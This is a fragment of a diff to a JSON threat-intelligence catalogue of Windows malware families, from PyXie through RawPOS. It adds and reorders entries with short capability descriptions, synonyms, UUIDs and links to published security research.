 "value": "PyLocky"
 },
+ {
+ "description": "Full-featured Python RAT compiled into an executable.\r\n\r\nPyXie RAT functionality includes:\r\n* Man-in-the-middle (MITM) Interception\r\n* Web-injects\r\n* Keylogging\r\n* Credential harvesting\r\n* Network Scanning\r\n* Cookie theft\r\n* Clearing logs\r\n* Recording video\r\n* Running arbitrary payloads\r\n* Monitoring USB drives and exfiltrating data\r\n* WebDav server\r\n* Socks5 proxy\r\n* Virtual Network Connection (VNC)\r\n* Certificate theft\r\n* Inventorying software\r\n* Enumerating the domain with Sharphound",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://www.secureworks.com/research/threat-profiles/gold-dupont",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/"
+ ],
+ "synonyms": [
+ "PyXie RAT"
+ ],
+ "type": []
+ },
+ "uuid": "41217f01-2b03-41c1-88fc-cda1eee65f75",
+ "value": "PyXie"
+ },
 {
 "description": "",
 "meta": {
@@ -13759,11 +25191,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars",
- "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/",
- "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf",
- "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/",
 "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan",
+ "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/",
 "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/",
+ "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/",
 "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/"
 ],
 "synonyms": [],
@@ -13773,23 +25204,73 @@ "value": "Qadars" }, { - "description": "", + "description": "QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", - "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", - "http://contagiodump.blogspot.com/2010/11/template.html", - "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", + "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://blog.quosec.net/posts/grap_qakbot_navigation/", + "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques", + "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/", + "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/", "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", + "https://twitter.com/redcanary/status/1334224861628039169", + "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/", + 
"https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", + "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/", "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.group-ib.com/blog/egregor", + "https://www.intrinsec.com/egregor-prolock/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://malwareandstuff.com/upnp-messing-up-security-since-years/", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", + "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html", + 
"https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", + "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", + "https://hatching.io/blog/reversing-qakbot", + "https://www.secureworks.com/research/threat-profiles/gold-lagoon", + "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://www.youtube.com/watch?v=iB1psRMtlqg", + "https://blog.quosec.net/posts/grap_qakbot_strings/", "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", - "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://twitter.com/TheDFIRReport/status/1361331598344478727", + "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "http://contagiodump.blogspot.com/2010/11/template.html", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/", + "https://www.group-ib.com/blog/prolock_evolution", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", + 
"https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks", + "https://isc.sans.edu/diary/rss/26862" ], "synonyms": [ "Pinkslipbot", - "Qbot" + "Qbot", + "Quakbot" ], "type": [] }, 
@@ -13829,38 +25310,69 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader", "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", - "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat" ], "synonyms": [], "type": [] }, "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", - "value": "Quant Loader" + "value": "QuantLoader" }, { "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. 
The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://github.com/quasar/QuasarRAT/tree/master/Client", - "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", + "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", + "https://twitter.com/malwrhunterteam/status/789153556255342596", + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://twitter.com/struppigel/status/1130455143504318466", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", + "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848", + 
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://blog.malwarelab.pl/posts/venom/", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://blog.ensilo.com/uncovering-new-activity-by-apt10", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", + "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", - "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", - 
"https://twitter.com/malwrhunterteam/status/789153556255342596", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + "https://www.antiy.cn/research/notice&report/research_report/20201228.html", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" + ], + "synonyms": [ + "CinaRAT", + "QuasarRAT", + "Yggdrasil" ], - "synonyms": [], "type": [] }, "uuid": "05252643-093b-4070-b62f-d5836683a9fa", 
@@ -13892,12 +25404,41 @@ "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", "value": "r980" }, + { + "description": "Raccoon is a stealer and collects \"passwords, cookies and autofill from all popular browsers (including FireFox x64), CC data, system information, almost all existing desktop wallets of cryptocurrencies\".", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon", + "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block", + "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", + "https://www.youtube.com/watch?v=1dbepxN2YD8", + "https://www.group-ib.com/blog/fakesecurity_raccoon", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://www.youtube.com/watch?v=5KHZSmBeMps", + "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html", + "https://www.riskiq.com/blog/labs/magecart-medialand/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", + "https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d", + "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf" + ], + "synonyms": [ + "Mohazo", + "RaccoonStealer", + "Racealer", + "Racoon" + ], + "type": [] + }, + "uuid": "027fb7d0-3e9b-4433-aee1-c266e165a5cc", + "value": "Raccoon" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", - "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant" ], "synonyms": [], "type": [] 
@@ -13918,6 +25459,66 @@ "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", "value": "RadRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker", + "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/", + "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/", + "https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf", + "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/", + "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + 
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information" + ], + "synonyms": [], + "type": [] + }, + "uuid": "33f55172-873b-409e-a09b-97ac1301b036", + "value": "RagnarLocker" + }, + { + "description": "According to Bleeping Computer, the ransomware is used in targeted attacks against unpatched Citrix servers. It excludes Russian and Chinese targets using the system's Language ID for filtering. It also tries to disable Windows Defender and has a number of UNIX filepath references in its strings. Encryption method is AES using a dynamically generated key, then bundling this key up via RSA.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok", + "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw", + "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://news.sophos.com/en-us/2020/05/21/asnarok2/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ce9dffb7-2220-4e9c-9cb1-221195ba42ba", + "value": "Ragnarok" + }, + { + "description": "Raindrop is a loader for Cobalt Strike that was observed in the SolarWinds attack.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "309f9be7-8824-4452-90b3-cef81fd10099", + "value": "Raindrop" + }, { "description": "", "meta": { 
@@ -13936,7 +25537,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", - "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html" + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", + "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html", + "https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf" ], "synonyms": [ "brebsd" 
@@ -13963,12 +25566,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", - "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", - "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", + "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html", + "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", + "https://www.youtube.com/watch?v=N4f2e8Mygag", "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", + "https://redcanary.com/resources/webinars/deep-dive-process-injection/", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://research.checkpoint.com/ramnits-network-proxy-servers/", "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", + "https://www.youtube.com/watch?v=l6ZunH6YG0A", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf" ], "synonyms": [ 
@@ -13979,11 +25590,29 @@ "uuid": "542161c0-47a4-4297-baca-5ed98386d228", "value": "Ramnit" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay", + "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/", + "https://www.antiy.cn/research/notice&report/research_report/20200522.html", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", + "https://www.youtube.com/watch?v=SKIu4LqMrns", + "https://www.sentinelone.com/blog/why-on-device-detection-matters-new-ramsay-trojan-targets-air-gapped-networks/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3b5bb37b-c5be-45b6-a4b1-83a03605a926", + "value": "Ramsay" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", + "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf", "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/", "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", 
@@ -14021,6 +25650,37 @@ "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", "value": "Ransoc" }, + { + "description": "RansomExx is a ransomware family that targeted multiple companies starting in mid-2020. It shares commonalities with Defray777.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx", + "https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/", + "https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/", + "https://github.com/Bleeping/Ransom.exx", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/" + ], + "synonyms": [ + "Defray777", + "Ransom X" + ], + "type": [] + }, + "uuid": "ddb31693-2356-4345-9c0f-ab37724090a4", + "value": "RansomEXX (Windows)" + }, { "description": "", "meta": { 
@@ -14037,13 +25697,29 @@ "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", "value": "Ransomlock" }, + { + "description": "Ransomware SNC is a ransomware who encrypts files and asks for a variable amount of Bitcoin before releasing the decryption key to your files. The threat actor asks to be contacted for negotiating the right ransom fee.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomware_snc", + "https://yomi.yoroi.company/report/5deea91bac2ea1dcf5337ad8/5deead588a4518a7074dc6e6/overview" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0e9c2936-7167-48fb-9dee-a83f83d8e41e", + "value": "Ransomware SNC" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", "https://twitter.com/malwrhunterteam/status/997748495888076800", - "https://twitter.com/malwrhunterteam/status/977275481765613569" + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://twitter.com/malwrhunterteam/status/977275481765613569", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://exchange.xforce.ibmcloud.com/collection/GuessWho-Ransomware-A-Variant-of-Rapid-Ransomware-ef226b9792fa4c1e34fa4c587db04145" ], "synonyms": [], "type": [] 
@@ -14091,25 +25767,66 @@ "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066", "value": "rarstar" }, + { + "description": "This is a backdoor that establishes persistence using the Startup folder. \r\nIt communicates to its C&C server using HTTPS and a static HTTP User-Agent \r\nstring. QUICKRIDE is capable of gathering information about the system, \r\ndownloading and loading executables, and uninstalling itself. It was leveraged \r\nagainst banks in Poland.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", + "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0", + "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", + "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", + "https://twitter.com/PhysicalDrive0/status/828915536268492800", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware" + ], + "synonyms": [ + "QUICKRIDE" + ], + "type": [] + }, + "uuid": "eead20f5-6a30-4700-8d14-cfb2d42eaff0", + "value": "Ratankba" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos", "http://blog.trex.re.kr/3", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], + "synonyms": [ + "RATANKBAPOS" + ], + "type": [] + }, + "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", + "value": "RatankbaPOS" + }, + { + "description": "", 
+ "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratsnif", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-ratsnif-new-network-vermin-from-oceanlotus.html" + ], "synonyms": [], "type": [] }, - "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", - "value": "RatabankaPOS" + "uuid": "2f700b52-4379-4b53-894b-1823e34ae71d", + "value": "RatSnif" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", + "https://www.youtube.com/watch?v=fevGZs0EQu8", "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" ], 
